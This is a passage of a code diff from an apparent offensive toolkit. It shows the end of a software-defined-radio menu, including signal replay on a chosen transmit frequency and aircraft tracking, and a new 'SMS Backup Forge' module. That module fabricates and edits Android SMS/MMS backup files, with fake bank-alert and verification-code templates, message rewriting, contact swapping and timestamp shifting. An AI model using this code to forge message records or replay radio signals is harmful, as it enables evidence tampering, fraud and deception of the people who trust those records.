({r.get('size_human', '?')})") + try: + idx = int(input(f"\n Select recording [1-{len(recordings)}]: ").strip()) - 1 + rec = recordings[idx] + freq = input(f" TX Frequency MHz [{rec.get('frequency', 100000000)/1e6:.3f}]: ").strip() + if not freq: + freq = str(rec.get('frequency', 100000000) / 1e6) + print(f"\n{Colors.CYAN}[*] Replaying {rec.get('filename')} at {freq} MHz...{Colors.RESET}") + result = sdr.replay_signal( + rec.get('file', rec.get('filename', '')), + frequency=int(float(freq) * 1000000) + ) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] {result.get('message', 'Done')}{Colors.RESET}") + except (ValueError, IndexError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] Cancelled{Colors.RESET}") + + elif choice == '5': + if sdr._adsb_running: + print(f"\n{Colors.CYAN}[*] ADS-B is running. 
Showing aircraft...{Colors.RESET}") + aircraft = sdr.get_adsb_aircraft() + if not aircraft: + print(f"{Colors.YELLOW} No aircraft detected yet{Colors.RESET}") + else: + print(f"\n {'ICAO':>8s} {'Callsign':>10s} {'Alt(ft)':>8s} {'Spd(kn)':>8s} {'Hdg':>5s} {'Msgs':>5s}") + print(f" {'-'*8} {'-'*10} {'-'*8} {'-'*8} {'-'*5} {'-'*5}") + for ac in aircraft[:20]: + alt = str(ac.get('altitude', '')) if ac.get('altitude') is not None else '--' + spd = str(ac.get('speed', '')) if ac.get('speed') is not None else '--' + hdg = str(ac.get('heading', '')) if ac.get('heading') is not None else '--' + print(f" {ac['icao']:>8s} {ac.get('callsign', ''):>10s} {alt:>8s} {spd:>8s} {hdg:>5s} {ac.get('messages', 0):>5d}") + + stop = input(f"\n Stop tracking? [y/N]: ").strip().lower() + if stop == 'y': + result = sdr.stop_adsb() + print(f"{Colors.GREEN}[+] {result.get('message', 'Stopped')}{Colors.RESET}") + else: + dev = input(" Device (rtl) [rtl]: ").strip() or 'rtl' + print(f"\n{Colors.CYAN}[*] Starting ADS-B tracking...{Colors.RESET}") + result = sdr.start_adsb(device=dev) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] {result.get('message', 'Started')}{Colors.RESET}") + + elif choice == '6': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] 
No recordings found{Colors.RESET}") + else: + print(f"\n Recordings:") + for i, r in enumerate(recordings): + print(f" {i+1}) {r.get('filename', 'unknown')} ({r.get('size_human', '?')})") + try: + idx = int(input(f"\n Select recording [1-{len(recordings)}]: ").strip()) - 1 + rec = recordings[idx] + print(f"\n{Colors.CYAN}[*] FM demodulating {rec.get('filename')}...{Colors.RESET}") + result = sdr.demodulate_fm(rec.get('file', rec.get('filename', ''))) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] Output: {result.get('filename')}{Colors.RESET}") + print(f" Duration: {result.get('duration', 0):.2f}s, Samples: {result.get('samples', 0)}") + except (ValueError, IndexError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] Cancelled{Colors.RESET}") + + elif choice == '7': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] No recordings found{Colors.RESET}") + else: + print(f"\n Recordings:") + for i, r in enumerate(recordings): + print(f" {i+1}) {r.get('filename', 'unknown')} ({r.get('size_human', '?')})") + try: + idx = int(input(f"\n Select recording [1-{len(recordings)}]: ").strip()) - 1 + rec = recordings[idx] + print(f"\n{Colors.CYAN}[*] AM demodulating {rec.get('filename')}...{Colors.RESET}") + result = sdr.demodulate_am(rec.get('file', rec.get('filename', ''))) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] Output: {result.get('filename')}{Colors.RESET}") + print(f" Duration: {result.get('duration', 0):.2f}s, Samples: {result.get('samples', 0)}") + except (ValueError, IndexError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] Cancelled{Colors.RESET}") + + elif choice == '8': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] 
No recordings found{Colors.RESET}") + else: + print(f"\n {'#':>3s} {'Filename':>30s} {'Freq':>12s} {'Size':>10s} {'Device':>8s} {'Date':>20s}") + print(f" {'-'*3} {'-'*30} {'-'*12} {'-'*10} {'-'*8} {'-'*20}") + for i, r in enumerate(recordings): + freq = r.get('frequency', 0) + freq_str = f"{freq/1e6:.3f} MHz" if freq else 'N/A' + date_str = r.get('completed', '')[:19] if r.get('completed') else 'N/A' + print(f" {i+1:>3d} {r.get('filename', 'unknown'):>30s} {freq_str:>12s} {r.get('size_human', '?'):>10s} {r.get('device', '?'):>8s} {date_str:>20s}") + + elif choice == '9': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] No recordings found{Colors.RESET}") + else: + print(f"\n Recordings:") + for i, r in enumerate(recordings): + print(f" {i+1}) {r.get('filename', 'unknown')} ({r.get('size_human', '?')})") + try: + idx = int(input(f"\n Select recording [1-{len(recordings)}]: ").strip()) - 1 + rec = recordings[idx] + print(f"\n{Colors.CYAN}[*] Analyzing {rec.get('filename')}...{Colors.RESET}") + result = sdr.analyze_signal(rec.get('file', rec.get('filename', ''))) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"\n {Colors.GREEN}Signal Analysis:{Colors.RESET}") + print(f" File: {result.get('file', 'unknown')}") + print(f" Size: {result.get('file_size_human', '?')}") + print(f" Samples: {result.get('total_samples', 0):,}") + pwr = result.get('power', {}) + print(f" Avg Power: {pwr.get('average_db', '?')} dB") + print(f" Peak Power: {pwr.get('peak_db', '?')} dB") + print(f" Dynamic Range: {pwr.get('dynamic_range_db', '?')} dB") + print(f" Duty Cycle: {result.get('duty_cycle_pct', '?')}%") + print(f" Modulation: {result.get('modulation_guess', '?')}") + except (ValueError, IndexError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] 
Cancelled{Colors.RESET}") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") diff --git a/modules/sms_forge.py b/modules/sms_forge.py new file mode 100644 index 0000000..f3c7e03 --- /dev/null +++ b/modules/sms_forge.py @@ -0,0 +1,1502 @@ +"""AUTARCH SMS/MMS Backup Forge + +Create and modify SMS/MMS backup XML files in the format used by +"SMS Backup & Restore" (SyncTech) -- the most popular Android SMS backup app. +Supports full conversation generation, template-based message creation, +bulk import/export, and timestamp manipulation. +""" + +DESCRIPTION = "SMS/MMS Backup Forge — Create & Modify Backup Conversations" +AUTHOR = "AUTARCH" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import csv +import json +import uuid +import time +import base64 +import html +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional, Any +from xml.etree import ElementTree as ET + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return Path(__file__).resolve().parent.parent / 'data' + + +# ── Module-level singleton ────────────────────────────────────────────────── + +_instance: Optional['SMSForge'] = None + + +def get_sms_forge() -> 'SMSForge': + """Return the module singleton, creating it on first call.""" + global _instance + if _instance is None: + _instance = SMSForge() + return _instance + + +# ── Built-in Conversation Templates ──────────────────────────────────────── + +BUILTIN_TEMPLATES = { + "business_meeting": { + "name": "Business Meeting", + "description": "Scheduling a meeting, confirming time and place", + "messages": [ + {"body": "Hi {contact}, are you available for a meeting on {date}?", "type": 2, "delay_minutes": 0}, + {"body": "Let me check my schedule. What time works for you?", "type": 1, "delay_minutes": 12}, + {"body": "How about {time} at {location}?", "type": 2, "delay_minutes": 5}, + {"body": "That works for me. 
I'll bring the {topic} documents.", "type": 1, "delay_minutes": 8}, + {"body": "Perfect. See you then!", "type": 2, "delay_minutes": 3}, + {"body": "See you there. Thanks for setting this up.", "type": 1, "delay_minutes": 2}, + ], + "variables": ["contact", "date", "time", "location", "topic"], + }, + "casual_chat": { + "name": "Casual Chat", + "description": "General friendly conversation between friends", + "messages": [ + {"body": "Hey {contact}! How's it going?", "type": 2, "delay_minutes": 0}, + {"body": "Hey! Pretty good, just got back from {activity}. You?", "type": 1, "delay_minutes": 15}, + {"body": "Nice! I've been {my_activity}. We should hang out soon.", "type": 2, "delay_minutes": 7}, + {"body": "Definitely! How about {day}?", "type": 1, "delay_minutes": 4}, + {"body": "Sounds great, let's do it. I'll text you the details later.", "type": 2, "delay_minutes": 3}, + {"body": "Cool, talk to you later!", "type": 1, "delay_minutes": 1}, + ], + "variables": ["contact", "activity", "my_activity", "day"], + }, + "delivery_notification": { + "name": "Delivery Notification", + "description": "Package tracking updates from a delivery service", + "messages": [ + {"body": "Your order #{order_id} has been shipped! Track at: {tracking_url}", "type": 1, "delay_minutes": 0}, + {"body": "Update: Your package is out for delivery today. Estimated arrival: {eta}.", "type": 1, "delay_minutes": 1440}, + {"body": "Your package has been delivered! Left at: {location}.", "type": 1, "delay_minutes": 360}, + ], + "variables": ["order_id", "tracking_url", "eta", "location"], + }, + "verification_codes": { + "name": "Verification Codes", + "description": "OTP/2FA codes from various services", + "messages": [ + {"body": "Your {service} verification code is: {code}. Do not share this code.", "type": 1, "delay_minutes": 0}, + {"body": "{service2} security code: {code2}. 
This code expires in 10 minutes.", "type": 1, "delay_minutes": 120}, + {"body": "Your {service3} login code is {code3}. If you didn't request this, ignore this message.", "type": 1, "delay_minutes": 240}, + ], + "variables": ["service", "code", "service2", "code2", "service3", "code3"], + }, + "bank_alerts": { + "name": "Bank Alerts", + "description": "Bank transaction notifications and alerts", + "messages": [ + {"body": "{bank}: Purchase of ${amount} at {merchant} on card ending {card_last4}. Balance: ${balance}.", "type": 1, "delay_minutes": 0}, + {"body": "{bank}: Direct deposit of ${deposit_amount} received. New balance: ${new_balance}.", "type": 1, "delay_minutes": 4320}, + {"body": "{bank} Alert: Unusual activity detected on your account. If this was not you, call {phone}.", "type": 1, "delay_minutes": 2880}, + {"body": "{bank}: Your scheduled payment of ${payment_amount} to {payee} has been processed.", "type": 1, "delay_minutes": 1440}, + ], + "variables": ["bank", "amount", "merchant", "card_last4", "balance", + "deposit_amount", "new_balance", "phone", + "payment_amount", "payee"], + }, + "custom": { + "name": "Custom", + "description": "Empty template for user-defined conversations", + "messages": [], + "variables": [], + }, +} + + +# ── SMS Forge Class ───────────────────────────────────────────────────────── + +class SMSForge: + """Create, modify, and export SMS/MMS backup XML files.""" + + def __init__(self): + self._data_dir = Path(get_data_dir()) / 'sms_forge' + self._data_dir.mkdir(parents=True, exist_ok=True) + self._messages: List[Dict[str, Any]] = [] + self._backup_set: str = self._generate_uuid() + self._backup_date: int = int(time.time() * 1000) + self._backup_type: str = "full" + self._custom_templates: Dict[str, dict] = {} + self._load_custom_templates() + + # ── Backup Management ─────────────────────────────────────────────────── + + def create_backup(self, messages: List[Dict[str, Any]], output_path: str) -> Dict[str, Any]: + """Create a 
new SMS Backup & Restore XML file from a list of message dicts. + + Each message dict should have at minimum: + address, body, type (for SMS) or msg_box (for MMS) + Optional: timestamp, contact_name, read, locked, attachments + """ + self._messages = [] + for msg in messages: + if msg.get('is_mms') or msg.get('attachments'): + self.add_mms( + address=msg.get('address', ''), + body=msg.get('body', ''), + attachments=msg.get('attachments', []), + msg_box=msg.get('msg_box', msg.get('type', 1)), + timestamp=msg.get('timestamp') or msg.get('date'), + contact_name=msg.get('contact_name', '(Unknown)'), + ) + else: + self.add_sms( + address=msg.get('address', ''), + body=msg.get('body', ''), + msg_type=msg.get('type', 1), + timestamp=msg.get('timestamp') or msg.get('date'), + contact_name=msg.get('contact_name', '(Unknown)'), + read=msg.get('read', 1), + locked=msg.get('locked', 0), + ) + return self.save_backup(output_path) + + def load_backup(self, xml_path: str) -> Dict[str, Any]: + """Parse existing backup XML into internal format.""" + path = Path(xml_path) + if not path.exists(): + return {'ok': False, 'error': f'File not found: {xml_path}'} + try: + tree = ET.parse(str(path)) + root = tree.getroot() + if root.tag != 'smses': + return {'ok': False, 'error': 'Invalid XML: root element must be '} + + self._backup_set = root.get('backup_set', self._generate_uuid()) + self._backup_date = int(root.get('backup_date', str(int(time.time() * 1000)))) + self._backup_type = root.get('type', 'full') + self._messages = [] + + for elem in root: + if elem.tag == 'sms': + msg = { + 'msg_kind': 'sms', + 'protocol': elem.get('protocol', '0'), + 'address': elem.get('address', ''), + 'date': int(elem.get('date', '0')), + 'type': int(elem.get('type', '1')), + 'subject': elem.get('subject', 'null'), + 'body': elem.get('body', ''), + 'toa': elem.get('toa', 'null'), + 'sc_toa': elem.get('sc_toa', 'null'), + 'service_center': elem.get('service_center', 'null'), + 'read': int(elem.get('read', 
'1')), + 'status': int(elem.get('status', '-1')), + 'locked': int(elem.get('locked', '0')), + 'sub_id': elem.get('sub_id', '-1'), + 'readable_date': elem.get('readable_date', ''), + 'contact_name': elem.get('contact_name', '(Unknown)'), + } + self._messages.append(msg) + elif elem.tag == 'mms': + msg = self._parse_mms_element(elem) + self._messages.append(msg) + + return { + 'ok': True, + 'count': len(self._messages), + 'backup_set': self._backup_set, + 'backup_date': self._backup_date, + } + except ET.ParseError as e: + return {'ok': False, 'error': f'XML parse error: {e}'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def _parse_mms_element(self, elem: ET.Element) -> Dict[str, Any]: + """Parse a single element into a dict.""" + msg: Dict[str, Any] = { + 'msg_kind': 'mms', + 'date': int(elem.get('date', '0')), + 'ct_t': elem.get('ct_t', 'application/vnd.wap.multipart.related'), + 'msg_box': int(elem.get('msg_box', '1')), + 'address': elem.get('address', ''), + 'sub': elem.get('sub', 'null'), + 'retr_st': elem.get('retr_st', 'null'), + 'd_tm': elem.get('d_tm', 'null'), + 'exp': elem.get('exp', 'null'), + 'locked': int(elem.get('locked', '0')), + 'm_id': elem.get('m_id', 'null'), + 'st': elem.get('st', 'null'), + 'retr_txt_cs': elem.get('retr_txt_cs', 'null'), + 'retr_txt': elem.get('retr_txt', 'null'), + 'creator': elem.get('creator', 'null'), + 'date_sent': elem.get('date_sent', '0'), + 'seen': int(elem.get('seen', '1')), + 'm_size': elem.get('m_size', 'null'), + 'rr': elem.get('rr', '129'), + 'sub_cs': elem.get('sub_cs', 'null'), + 'resp_st': elem.get('resp_st', 'null'), + 'ct_cls': elem.get('ct_cls', 'null'), + 'm_cls': elem.get('m_cls', 'personal'), + 'd_rpt': elem.get('d_rpt', '129'), + 'v': elem.get('v', '18'), + '_id': elem.get('_id', '1'), + 'tr_id': elem.get('tr_id', 'null'), + 'resp_txt': elem.get('resp_txt', 'null'), + 'ct_l': elem.get('ct_l', 'null'), + 'm_type': elem.get('m_type', '132'), + 'readable_date': 
elem.get('readable_date', ''), + 'contact_name': elem.get('contact_name', '(Unknown)'), + 'pri': elem.get('pri', '129'), + 'sub_id': elem.get('sub_id', '-1'), + 'text_only': elem.get('text_only', '0'), + 'parts': [], + 'addrs': [], + 'body': '', + } + + parts_elem = elem.find('parts') + if parts_elem is not None: + for part_elem in parts_elem.findall('part'): + part = { + 'seq': part_elem.get('seq', '0'), + 'ct': part_elem.get('ct', 'text/plain'), + 'name': part_elem.get('name', 'null'), + 'chset': part_elem.get('chset', 'null'), + 'cd': part_elem.get('cd', 'null'), + 'fn': part_elem.get('fn', 'null'), + 'cid': part_elem.get('cid', 'null'), + 'cl': part_elem.get('cl', 'null'), + 'ctt_s': part_elem.get('ctt_s', 'null'), + 'ctt_t': part_elem.get('ctt_t', 'null'), + 'text': part_elem.get('text', 'null'), + 'data': part_elem.get('data', 'null'), + } + msg['parts'].append(part) + # Extract body text from text/plain part + if part['ct'] == 'text/plain' and part['text'] != 'null': + msg['body'] = part['text'] + + addrs_elem = elem.find('addrs') + if addrs_elem is not None: + for addr_elem in addrs_elem.findall('addr'): + addr = { + 'address': addr_elem.get('address', ''), + 'type': addr_elem.get('type', '137'), + 'charset': addr_elem.get('charset', '106'), + } + msg['addrs'].append(addr) + + return msg + + def save_backup(self, output_path: str) -> Dict[str, Any]: + """Save current state to XML in SMS Backup & Restore format.""" + try: + xml_str = self._build_xml() + out = Path(output_path) + out.parent.mkdir(parents=True, exist_ok=True) + out.write_text(xml_str, encoding='utf-8') + return { + 'ok': True, + 'path': str(out), + 'count': len(self._messages), + 'size': out.stat().st_size, + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + def merge_backups(self, paths: List[str]) -> Dict[str, Any]: + """Merge multiple backup files, deduplicating by date+address+body.""" + seen = set() + for msg in self._messages: + seen.add(self._dedup_key(msg)) + + 
added = 0 + errors = [] + for p in paths: + try: + tree = ET.parse(p) + root = tree.getroot() + if root.tag != 'smses': + errors.append(f'{p}: root element is not ') + continue + + for elem in root: + if elem.tag == 'sms': + key = f"{elem.get('date', '0')}|{elem.get('address', '')}|{elem.get('body', '')}" + if key not in seen: + seen.add(key) + msg = { + 'msg_kind': 'sms', + 'protocol': elem.get('protocol', '0'), + 'address': elem.get('address', ''), + 'date': int(elem.get('date', '0')), + 'type': int(elem.get('type', '1')), + 'subject': elem.get('subject', 'null'), + 'body': elem.get('body', ''), + 'toa': elem.get('toa', 'null'), + 'sc_toa': elem.get('sc_toa', 'null'), + 'service_center': elem.get('service_center', 'null'), + 'read': int(elem.get('read', '1')), + 'status': int(elem.get('status', '-1')), + 'locked': int(elem.get('locked', '0')), + 'sub_id': elem.get('sub_id', '-1'), + 'readable_date': elem.get('readable_date', ''), + 'contact_name': elem.get('contact_name', '(Unknown)'), + } + self._messages.append(msg) + added += 1 + elif elem.tag == 'mms': + mms_msg = self._parse_mms_element(elem) + key = self._dedup_key(mms_msg) + if key not in seen: + seen.add(key) + self._messages.append(mms_msg) + added += 1 + except Exception as e: + errors.append(f'{p}: {e}') + + self._messages.sort(key=lambda m: m.get('date', 0)) + result: Dict[str, Any] = { + 'ok': True, + 'total': len(self._messages), + 'added': added, + } + if errors: + result['errors'] = errors + return result + + def _dedup_key(self, msg: Dict[str, Any]) -> str: + """Generate a deduplication key from a message dict.""" + date_val = str(msg.get('date', '0')) + addr = msg.get('address', '') + body = msg.get('body', '') + if msg.get('msg_kind') == 'mms' and not body: + for part in msg.get('parts', []): + if part.get('ct') == 'text/plain' and part.get('text', 'null') != 'null': + body = part['text'] + break + return f"{date_val}|{addr}|{body}" + + def get_backup_stats(self) -> Dict[str, Any]: + """Return 
stats: message count, contacts, date range, SMS/MMS breakdown.""" + if not self._messages: + return { + 'total': 0, + 'sms_count': 0, + 'mms_count': 0, + 'contacts': [], + 'date_range': None, + 'sent': 0, + 'received': 0, + } + + sms_count = sum(1 for m in self._messages if m.get('msg_kind') == 'sms') + mms_count = sum(1 for m in self._messages if m.get('msg_kind') == 'mms') + + contacts: Dict[str, Dict[str, Any]] = {} + for m in self._messages: + addr = m.get('address', '') + name = m.get('contact_name', '(Unknown)') + if addr not in contacts: + contacts[addr] = {'address': addr, 'name': name, 'count': 0} + contacts[addr]['count'] += 1 + + dates = [m.get('date', 0) for m in self._messages if m.get('date', 0) > 0] + date_range = None + if dates: + date_range = { + 'earliest': min(dates), + 'latest': max(dates), + 'earliest_readable': self._timestamp_to_readable(min(dates)), + 'latest_readable': self._timestamp_to_readable(max(dates)), + } + + sent = 0 + received = 0 + for m in self._messages: + if m.get('msg_kind') == 'sms': + if m.get('type') == 2: + sent += 1 + elif m.get('type') == 1: + received += 1 + elif m.get('msg_kind') == 'mms': + if m.get('msg_box') == 2: + sent += 1 + elif m.get('msg_box') == 1: + received += 1 + + return { + 'total': len(self._messages), + 'sms_count': sms_count, + 'mms_count': mms_count, + 'contacts': list(contacts.values()), + 'date_range': date_range, + 'sent': sent, + 'received': received, + 'backup_set': self._backup_set, + } + + # ── Message Creation ──────────────────────────────────────────────────── + + def add_sms(self, address: str, body: str, msg_type: int = 1, + timestamp: Optional[int] = None, contact_name: str = '(Unknown)', + read: int = 1, locked: int = 0) -> Dict[str, Any]: + """Add a single SMS message. + + Args: + address: Phone number (e.g. 
+15551234567) + body: Message text + msg_type: 1=received, 2=sent, 3=draft, 4=outbox, 5=failed, 6=queued + timestamp: Epoch milliseconds (defaults to now) + contact_name: Display name for contact + read: 1=read, 0=unread + locked: 0=unlocked, 1=locked + """ + if timestamp is None: + timestamp = int(time.time() * 1000) + + msg = { + 'msg_kind': 'sms', + 'protocol': '0', + 'address': address, + 'date': timestamp, + 'type': msg_type, + 'subject': 'null', + 'body': body, + 'toa': 'null', + 'sc_toa': 'null', + 'service_center': 'null', + 'read': read, + 'status': -1, + 'locked': locked, + 'sub_id': '-1', + 'readable_date': self._timestamp_to_readable(timestamp), + 'contact_name': contact_name, + } + self._messages.append(msg) + return {'ok': True, 'index': len(self._messages) - 1, 'date': timestamp} + + def add_mms(self, address: str, body: str = '', + attachments: Optional[List[Dict[str, str]]] = None, + msg_box: int = 1, timestamp: Optional[int] = None, + contact_name: str = '(Unknown)') -> Dict[str, Any]: + """Add an MMS message with optional attachments. 
+ + Args: + address: Phone number + body: Text body of the MMS + attachments: List of dicts with keys: path (file path), content_type (MIME), + or data (base64 encoded), filename + msg_box: 1=received, 2=sent, 3=draft, 4=outbox + timestamp: Epoch milliseconds + contact_name: Display name + """ + if timestamp is None: + timestamp = int(time.time() * 1000) + if attachments is None: + attachments = [] + + parts: List[Dict[str, str]] = [] + has_media = len(attachments) > 0 + + # SMIL part (required for MMS with attachments) + if has_media: + smil_body = '' + smil_body += '' + smil_body += '' + smil_body += '' + if body: + smil_body += '' + for i, att in enumerate(attachments): + fname = att.get('filename', f'attachment_{i}') + ct = att.get('content_type', 'application/octet-stream') + if ct.startswith('image/'): + smil_body += f'' + elif ct.startswith('audio/'): + smil_body += f'' + parts.append({ + 'seq': '0', 'ct': 'application/smil', 'name': 'null', + 'chset': 'null', 'cd': 'null', 'fn': 'null', + 'cid': '', 'cl': 'smil.xml', + 'ctt_s': 'null', 'ctt_t': 'null', + 'text': smil_body, 'data': 'null', + }) + + # Attachment parts + for i, att in enumerate(attachments): + fname = att.get('filename', f'attachment_{i}') + ct = att.get('content_type', 'application/octet-stream') + data = 'null' + if 'path' in att and os.path.isfile(att['path']): + data = self._encode_attachment(att['path']) + elif 'data' in att: + data = att['data'] + parts.append({ + 'seq': '0', 'ct': ct, 'name': fname, + 'chset': 'null', 'cd': 'null', 'fn': 'null', + 'cid': f'<{fname}>', 'cl': fname, + 'ctt_s': 'null', 'ctt_t': 'null', + 'text': 'null', 'data': data, + }) + + # Text part + if body: + parts.append({ + 'seq': '0', 'ct': 'text/plain', 'name': 'null', + 'chset': '106', 'cd': 'null', 'fn': 'null', + 'cid': 'null', 'cl': 'txt000.txt', + 'ctt_s': 'null', 'ctt_t': 'null', + 'text': body, 'data': 'null', + }) + + text_only = '1' if not has_media else '0' + + # Address records + addrs = [] + if 
msg_box == 1: + # Received: sender is type 137, self is type 151 + addrs.append({'address': address, 'type': '137', 'charset': '106'}) + addrs.append({'address': 'insert-address-token', 'type': '151', 'charset': '106'}) + else: + # Sent: self is type 137, recipient is type 151 + addrs.append({'address': 'insert-address-token', 'type': '137', 'charset': '106'}) + addrs.append({'address': address, 'type': '151', 'charset': '106'}) + + msg: Dict[str, Any] = { + 'msg_kind': 'mms', + 'date': timestamp, + 'ct_t': 'application/vnd.wap.multipart.related', + 'msg_box': msg_box, + 'address': address, + 'sub': 'null', + 'retr_st': 'null', + 'd_tm': 'null', + 'exp': 'null', + 'locked': 0, + 'm_id': 'null', + 'st': 'null', + 'retr_txt_cs': 'null', + 'retr_txt': 'null', + 'creator': 'null', + 'date_sent': '0', + 'seen': 1, + 'm_size': 'null', + 'rr': '129', + 'sub_cs': 'null', + 'resp_st': 'null', + 'ct_cls': 'null', + 'm_cls': 'personal', + 'd_rpt': '129', + 'v': '18', + '_id': str(len(self._messages) + 1), + 'tr_id': 'null', + 'resp_txt': 'null', + 'ct_l': 'null', + 'm_type': '132', + 'readable_date': self._timestamp_to_readable(timestamp), + 'contact_name': contact_name, + 'pri': '129', + 'sub_id': '-1', + 'text_only': text_only, + 'parts': parts, + 'addrs': addrs, + 'body': body, + } + self._messages.append(msg) + return {'ok': True, 'index': len(self._messages) - 1, 'date': timestamp} + + def add_conversation(self, address: str, contact_name: str, + messages: List[Dict[str, Any]], + start_timestamp: Optional[int] = None) -> Dict[str, Any]: + """Add a full conversation from a list of message dicts. 
+ + Each message dict: {body: str, type: int (1=received, 2=sent), delay_minutes: int} + """ + if start_timestamp is None: + start_timestamp = int(time.time() * 1000) + + current_ts = start_timestamp + added = 0 + for msg in messages: + delay = msg.get('delay_minutes', 0) + current_ts += delay * 60 * 1000 + self.add_sms( + address=address, + body=msg.get('body', ''), + msg_type=msg.get('type', 1), + timestamp=current_ts, + contact_name=contact_name, + read=msg.get('read', 1), + locked=msg.get('locked', 0), + ) + added += 1 + + return { + 'ok': True, + 'added': added, + 'start': start_timestamp, + 'end': current_ts, + } + + def generate_conversation(self, address: str, contact_name: str, + template: str, variables: Optional[Dict[str, str]] = None, + start_timestamp: Optional[int] = None) -> Dict[str, Any]: + """Generate a conversation from a template with variable substitution. + + Args: + address: Phone number + contact_name: Display name + template: Template name (e.g. 'business_meeting', 'casual_chat') + variables: Dict of variable names to values for substitution + start_timestamp: Starting epoch ms timestamp + """ + tmpl = self._get_template(template) + if tmpl is None: + return {'ok': False, 'error': f'Template not found: {template}'} + + if variables is None: + variables = {} + + messages = [] + for msg_tmpl in tmpl.get('messages', []): + body = msg_tmpl['body'] + for key, val in variables.items(): + body = body.replace('{' + key + '}', str(val)) + messages.append({ + 'body': body, + 'type': msg_tmpl.get('type', 1), + 'delay_minutes': msg_tmpl.get('delay_minutes', 0), + }) + + return self.add_conversation(address, contact_name, messages, start_timestamp) + + def bulk_add(self, csv_path: str) -> Dict[str, Any]: + """Import messages from CSV file. 
+ + Expected CSV columns: address, body, type, timestamp, contact_name + """ + path = Path(csv_path) + if not path.exists(): + return {'ok': False, 'error': f'File not found: {csv_path}'} + try: + added = 0 + errors = [] + with open(str(path), 'r', encoding='utf-8', newline='') as f: + reader = csv.DictReader(f) + for row_num, row in enumerate(reader, start=2): + try: + address = row.get('address', '').strip() + body = row.get('body', '').strip() + msg_type = int(row.get('type', '1').strip()) + ts_str = row.get('timestamp', '').strip() + timestamp = int(ts_str) if ts_str else None + contact_name = row.get('contact_name', '(Unknown)').strip() + self.add_sms(address, body, msg_type, timestamp, contact_name) + added += 1 + except Exception as e: + errors.append(f'Row {row_num}: {e}') + result: Dict[str, Any] = {'ok': True, 'added': added} + if errors: + result['errors'] = errors + return result + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Message Modification ──────────────────────────────────────────────── + + def find_messages(self, address: Optional[str] = None, + date_from: Optional[int] = None, + date_to: Optional[int] = None, + keyword: Optional[str] = None) -> List[Dict[str, Any]]: + """Search messages with filters. 
Returns list of {index, ...msg} dicts.""" + results = [] + for i, msg in enumerate(self._messages): + if address and msg.get('address', '') != address: + continue + msg_date = msg.get('date', 0) + if date_from and msg_date < date_from: + continue + if date_to and msg_date > date_to: + continue + if keyword: + body = msg.get('body', '') + if msg.get('msg_kind') == 'mms' and not body: + for part in msg.get('parts', []): + if part.get('ct') == 'text/plain' and part.get('text', 'null') != 'null': + body = part['text'] + break + if keyword.lower() not in body.lower(): + continue + result = dict(msg) + result['index'] = i + results.append(result) + return results + + def modify_message(self, index: int, new_body: Optional[str] = None, + new_timestamp: Optional[int] = None, + new_contact: Optional[str] = None) -> Dict[str, Any]: + """Modify an existing message by index.""" + if index < 0 or index >= len(self._messages): + return {'ok': False, 'error': f'Invalid index: {index}'} + + msg = self._messages[index] + if new_body is not None: + if msg.get('msg_kind') == 'mms': + # Update text part in MMS + found_text = False + for part in msg.get('parts', []): + if part.get('ct') == 'text/plain': + part['text'] = new_body + found_text = True + break + if not found_text: + msg.setdefault('parts', []).append({ + 'seq': '0', 'ct': 'text/plain', 'name': 'null', + 'chset': '106', 'cd': 'null', 'fn': 'null', + 'cid': 'null', 'cl': 'txt000.txt', + 'ctt_s': 'null', 'ctt_t': 'null', + 'text': new_body, 'data': 'null', + }) + msg['body'] = new_body + else: + msg['body'] = new_body + + if new_timestamp is not None: + msg['date'] = new_timestamp + msg['readable_date'] = self._timestamp_to_readable(new_timestamp) + + if new_contact is not None: + msg['contact_name'] = new_contact + + return {'ok': True, 'index': index} + + def delete_messages(self, indices: List[int]) -> Dict[str, Any]: + """Delete messages by index. 
Indices are processed in reverse order.""" + valid = [i for i in sorted(set(indices), reverse=True) + if 0 <= i < len(self._messages)] + for i in valid: + self._messages.pop(i) + return {'ok': True, 'deleted': len(valid), 'remaining': len(self._messages)} + + def replace_contact(self, old_address: str, new_address: str, + new_name: Optional[str] = None) -> Dict[str, Any]: + """Change contact address (and optionally name) across all messages.""" + updated = 0 + for msg in self._messages: + if msg.get('address') == old_address: + msg['address'] = new_address + if new_name is not None: + msg['contact_name'] = new_name + updated += 1 + # Also update MMS addr records + for addr in msg.get('addrs', []): + if addr.get('address') == old_address: + addr['address'] = new_address + return {'ok': True, 'updated': updated} + + def shift_timestamps(self, address: Optional[str], offset_minutes: int) -> Dict[str, Any]: + """Shift all timestamps for a contact (or all messages if address is None).""" + offset_ms = offset_minutes * 60 * 1000 + shifted = 0 + for msg in self._messages: + if address is None or msg.get('address') == address: + msg['date'] = msg.get('date', 0) + offset_ms + msg['readable_date'] = self._timestamp_to_readable(msg['date']) + shifted += 1 + return {'ok': True, 'shifted': shifted, 'offset_minutes': offset_minutes} + + # ── Conversation Templates ────────────────────────────────────────────── + + def get_templates(self) -> Dict[str, Any]: + """Return all available conversation templates (built-in + custom).""" + templates = {} + for key, tmpl in BUILTIN_TEMPLATES.items(): + templates[key] = { + 'name': tmpl['name'], + 'description': 